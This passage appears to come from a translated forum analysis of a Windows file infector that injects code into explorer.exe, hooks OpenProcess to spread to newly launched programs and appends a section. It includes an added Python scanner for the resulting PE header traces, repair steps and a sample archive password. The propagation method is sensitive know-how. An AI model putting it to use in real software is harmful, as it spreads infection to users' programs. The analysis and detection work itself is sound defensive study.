0013EAB4 4AD34400 |CurrentDir = "C:\Documents and Settings\Administrator"
0013EAB8 0013FB38 |pStartupInfo = 0013FB38
0013EABC 0013FB80 \pProcessInfo = 0013FB80
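The four section-adding steps summarised above leave traces a defender can check for without any debugger: an entry point that sits in the last section, a section that is both writable and executable, and a SizeOfImage that no longer covers the final section if step 4 was skipped. The following added example (mine, not the author's, and not a dump of the sample) constructs a header-only PE32 in the clean and in the infected layout (a '.zxd' section of 0x1A00 bytes at RVA 0x63000, so that entry point 0x1063000 minus the 0x1000000 image base lands in it; section sizes and characteristics are constructed assumptions) and scans it for those indicators.

```python
import struct

SECTION_ALIGN, FILE_ALIGN = 0x1000, 0x200
IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE = 0x20000000, 0x80000000

# Constructed layouts (assumptions, not dumped from the sample): (name, rva, vsize, characteristics).
# The infected one appends '.zxd' holding the 0x1A00 bytes of the eleventh WriteFile above.
CLEAN_LAYOUT = [(".text", 0x1000, 0x20000, 0x60000020),
                (".data", 0x21000, 0x5000, 0xC0000040),
                (".rsrc", 0x26000, 0x3D000, 0x40000040)]
INFECTED_LAYOUT = CLEAN_LAYOUT + [(".zxd", 0x63000, 0x1A00, 0xE0000060)]

def align_up(n, a):
    return (n + a - 1) & ~(a - 1)

def build_pe32(sections, entry_rva, size_of_image=None):
    """Build a header-only PE32 image (test fixture). Passing size_of_image explicitly
    simulates an infector that appended a section but forgot to fix SizeOfImage (step 4)."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 60, 64)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                     # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)                # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x01000000)               # ImageBase
    struct.pack_into("<II", opt, 32, SECTION_ALIGN, FILE_ALIGN)
    last_end = sections[-1][1] + sections[-1][2]
    struct.pack_into("<I", opt, 56, size_of_image or align_up(last_end, SECTION_ALIGN))
    struct.pack_into("<I", opt, 60, 0x400)                    # SizeOfHeaders
    hdrs = b"".join(struct.pack("<8sIIIIIIHHI", n.encode().ljust(8, b"\0"), vs, rva,
                                align_up(vs, FILE_ALIGN), 0x400, 0, 0, 0, 0, ch)
                    for n, rva, vs, ch in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + hdrs

def scan_pe32(data):
    """Return the infection indicators found in a PE32 header, as a list of strings."""
    pe = struct.unpack_from("<I", data, 60)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec = struct.unpack_from("<H", data, pe + 6)[0]
    opt = pe + 24
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    sec_align = struct.unpack_from("<I", data, opt + 32)[0]
    size_of_image = struct.unpack_from("<I", data, opt + 56)[0]
    first_hdr = opt + struct.unpack_from("<H", data, pe + 20)[0]   # skip SizeOfOptionalHeader
    secs = []
    for i in range(nsec):
        name, vs, rva, *_, ch = struct.unpack_from("<8sIIIIIIHHI", data, first_hdr + 40 * i)
        secs.append((name.rstrip(b"\0").decode(errors="replace"), rva, vs, ch))
    findings = []
    ep_sec = next((s for s in secs if s[1] <= entry < s[1] + align_up(s[2], sec_align)), None)
    if ep_sec is None:
        findings.append("entry point lies outside every section")
    elif ep_sec is secs[-1] and len(secs) > 1:
        findings.append(f"entry point in last section {ep_sec[0]!r} (appended section?)")
    for name, _, _, ch in secs:
        if ch & IMAGE_SCN_MEM_EXECUTE and ch & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {name!r} is writable and executable")
    if size_of_image != align_up(secs[-1][1] + secs[-1][2], sec_align):
        findings.append("SizeOfImage does not cover the last section")
    return findings
```

Restoring the original entry point with LoadPE, as the author suggests for manual repair, makes the first indicator disappear; removing the section clears the rest.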
The flow of this program is now clear; let's summarise.

When the malicious program runs it modifies explorer.exe, writing its malicious code into it remotely, then patches the OpenProcess API of kernel32.dll inside explorer.exe so that its entry point first executes the malicious code.

As we know, explorer.exe is the desktop process; when a program is launched from the desktop it goes through its OpenProcess, but since that has been hijacked the malicious code runs first and infects the program being started, achieving wider spread.

In fact the program does no real damage: it adds a section, hijacks the OpenProcess API of kernel32.dll in explorer.exe, and pops up a MessageBox to scare the user into believing they are infected. Whether because of how the author wrote it or not, it constantly crashes explorer.exe.

Finally, the fix:

Manual repair: first reboot the machine, recover the original entry point, and use LoadPE to set the entry point back; that repairs the infected program. For a more thorough repair you can remove the section with a hex editor and LoadPE and then fix the entry point.

Automatic repair: download an antivirus product; they can fully detect and clean this kind of infector nowadays (although some antivirus products do not repair but simply delete the file, heh).

Some parts are still not analysed well, so I ask the experts for their guidance. Thanks to senior L for the pointers and to senior Xu for providing the sample.

Sample:
Extraction password: 52pojie